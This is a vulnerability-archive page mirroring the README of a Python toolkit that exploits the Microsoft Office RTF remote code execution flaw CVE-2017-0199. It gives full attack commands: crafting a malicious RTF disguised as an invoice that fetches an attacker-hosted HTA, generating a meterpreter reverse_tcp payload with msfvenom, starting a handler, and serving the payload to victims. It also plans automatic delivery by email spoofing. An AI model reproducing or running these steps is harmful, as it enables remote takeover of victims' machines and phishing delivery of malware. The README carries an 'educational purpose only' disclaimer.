Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-0199 PoC — Microsoft Office 安全漏洞

Source
https://github.com/Exploit-install/CVE-2017-0199
Associated Vulnerability
Title:Microsoft Office 安全漏洞 (CVE-2017-0199)
Description:Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API."
Description
Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / any other payload to victim without any complex configuration.
Readme
## Exploit toolkit CVE-2017-0199 - v2.0

Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration.

### Video tutorial

https://youtu.be/42LjG7bAvpg

### Release note:

Introduced following capabilities to the script

	- Generate Malicious RTF file using toolkit
	- Run toolkit in an exploitation mode as tiny HTA + Web server
Version: Python version 2.7.13

### Future release:

Working on following feature

	- Automatically send generated malicious RTF to victim using email spoofing
		
### Example:

- Step 1: Generate malicious RTF file using following command and send it to victim

    	Syntax:
    
    	# python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
    
    	Example:
    
    	# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
    
    
- Step 2 (Optional, if using MSF Payload) : Generate metasploit payload and start handler
    
    	Example:
    
    	Generate Payload:
	
    	# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
	
        Start Handler:
	
        # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
	
    
- Step 3: Start toolkit in exploitation mode to deliver payloads
    
    	Syntax:
    
    	# python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
    
    	Example:
    
    	# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
    
    
    
### Command line arguments:

    # python cve-2017-0199_toolkit.py -h

    This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)

    Modes:

    -M gen                                          Generate Malicious RTF file only

         Generate malicious RTF file:

          -w <Filename.rtf>                   Name of malicious RTF file (Share this file with victim).

          -u <http://attacker.com/test.hta>   The path to an hta file. Normally, this should be a domain or IP where this tool is running.

                                                 For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and

                                                 will be requested once victim will open malicious RTF file.
    -M exp                                          Start exploitation mode

         Exploitation:

          -p <TCP port:Default 80>            Local port number.

          -e <http://attacker.com/shell.exe>  The path of an executable file / meterpreter shell / payload  which needs to be executed on target.

          -l </tmp/shell.exe>                 Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).


### Disclaimer

This program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (bhdresh) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using this program you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not bhdresh's responsibility.

### Credit

@nixawk for RTF sample, @bhdresh

### Bug, issues, feature requests

Obviously, I am not a fulltime developer so expect some hiccups

Please report bugs, issues to bhdresh@gmail.com
File Snapshot

 [4.0K]  /data/pocs/5a7da67e5914ca4d55fb847bb1cb7215665d7f8d
├── [ 17K]  cve-2017-0199_toolkit.py
└── [3.7K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →